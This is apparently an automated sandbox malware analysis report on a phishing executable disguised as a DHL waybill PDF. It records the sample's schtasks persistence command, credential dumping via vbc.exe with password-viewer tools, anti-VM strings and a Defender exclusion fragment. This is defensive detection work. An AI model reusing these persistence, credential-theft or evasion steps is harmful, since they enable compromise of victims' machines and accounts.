            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693BF1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693BCE
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693A77
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693A02
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693ADD
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693AAA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693D40
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693DDD
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693DA0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693C73
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01690C35
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693C1D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01691F61
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693E75
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01698E28
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01696E08
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693E1A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_060562B8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_06054310
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_06054C00
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_0605FBD0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_0605C281
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_0605C2C8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_06059080
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_06059090
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_06053FC0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0043FBD3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 24_2_00404DE5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 24_2_00404E56
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 24_2_00404EC7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 24_2_00404F58
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 24_2_0040BF6B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00415F19 appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 0044468C appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 004162C2 appears 87 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00412084 appears 39 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 00444B90 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 0041607A appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: String function: 004083D6 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_0040978A memset, CreateFileW, NtQuerySystemInformation, NtQuerySystemInformation, FindCloseChangeNotification, GetCurrentProcessId, _wcsicmp, _wcsicmp, _wcsicmp, OpenProcess, GetCurrentProcess, DuplicateHandle, memset, NtQueryObject, CloseHandle, _wcsicmp, CloseHandle
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Binary or memory string: OriginalFilename vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000003.269608946.0000000001772000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameReborn Stub.exe" vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000000.276423081.0000000000F6A000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenameReborn Stub.exe" vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Binary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: cmsyNzu.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Virustotal: Detection: 33%
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; File read: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown; Process created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe 'C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; System information queried: HandleInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; File created: C:\Users\user\AppData\Roaming\cmsyNzu.exe
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; File created: C:\Users\user\AppData\Local\Temp\tmp70BF.tmp
            Source: classification engine; Classification label: mal100.phis.troj.spyw.evad.winEXE@10/7@0/1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00418073 GetDiskFreeSpaceW, GetDiskFreeSpaceA, free
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp; Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe; Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200b????????????????????????????????????????.cs; Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.cs; Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.cs; Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202a????????????????????????????????????????.cs; Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00417BE9 GetLastError, FormatMessageW, FormatMessageA, LocalFree, free
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_00413424 CreateToolhelp32Snapshot, memset, Process32FirstW, OpenProcess, memset, GetModuleHandleW, GetProcAddress, CloseHandle, free, Process32NextW, CloseHandle
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Mutant created: \Sessions\1\BaseNamedObjects\vsnTDpNgPVtyiPSBVsGfKIlxfV
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Mutant created: \Sessions\1\BaseNamedObjects\reblGreen Software DimWin Brightness
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Mutant created: \Sessions\1\BaseNamedObjects\0afb590f-6441-4e30-9017-486274a19cc9
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 11_2_004141E0 FindResourceW, SizeofResource, LoadResource, LockResource
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u206b????????????????????????????????????????.cs; Cryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.cs; Cryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.cs; Cryptographic APIs: 'TransformFinalBlock'
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u202d????????????????????????????????????????.cs; Cryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static file information: File size 1078272 > 1048576
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106800
            Source: DHL_AWB 518877882999_887755468_pdf.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, vbc.exe

            Data Obfuscation:

            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Unpacked PE file: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Unpacked PE file: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 0_2_00F420E0 push ecx; ret 0_2_00F42101
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 0_2_00F421E2 push ecx; iretd 0_2_00F421FF
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 0_2_00F431C9 push esi; retf 0_2_00F431CA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 0_2_00F4216E push 3D7EE852h; retf 0_2_00F4217B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 0_2_019A727B push esi; retf 0_2_019A727C
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_00E621E2 push ecx; iretd 7_2_00E621FF
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_00E620E0 push ecx; ret 7_2_00E62101
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_00E631C9 push esi; retf 7_2_00E631CA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_00E6216E push 3D7EE852h; retf 7_2_00E6217B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_0169326C push ss; retf 7_2_0169326D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_016932F5 push ss; retf 7_2_016932F6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_0169F4E0 push es; ret 7_2_0169F4F0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Code function: 7_2_016997A9 push 00000069h; ret 7_2_016997AB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00444975 push ecx; ret 11_2_00444985
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00444B90 push eax; ret 11_2_00444BA4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00444B90 push eax; ret 11_2_00444BCC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00448E74 push eax; ret 11_2_00448E81
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_0042CF44 push ebx; retf 0042h 11_2_0042CF49
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 24_2_00412341 push ecx; ret 24_2_00412351
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 24_2_00412360 push eax; ret 24_2_00412374
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 24_2_00412360 push eax; ret 24_2_0041239C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004443B0
            Source: initial sample Static PE information: section name: .text entropy: 7.77724876545
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe File created: C:\Users\user\AppData\Roaming\cmsyNzu.exe

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00443A61
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.3466e5c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 4844 Thread sleep time: -34041s >= -30000s
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 4732 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 5016 Thread sleep count: 136 > 30
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 5016 Thread sleep time: -136000s >= -30000s
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 476 Thread sleep count: 149 > 30
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe TID: 476 Thread sleep time: -149000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040978A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_0041829C memset,GetSystemInfo,11_2_0041829C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,11_2_0040938F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,11_2_00408CAC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 24_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,24_2_0040702D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Thread delayed: delay time: 34041
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Thread delayed: delay time: 922337203685477
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040978A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 11_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004443B0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory allocated: page read and write | page guard

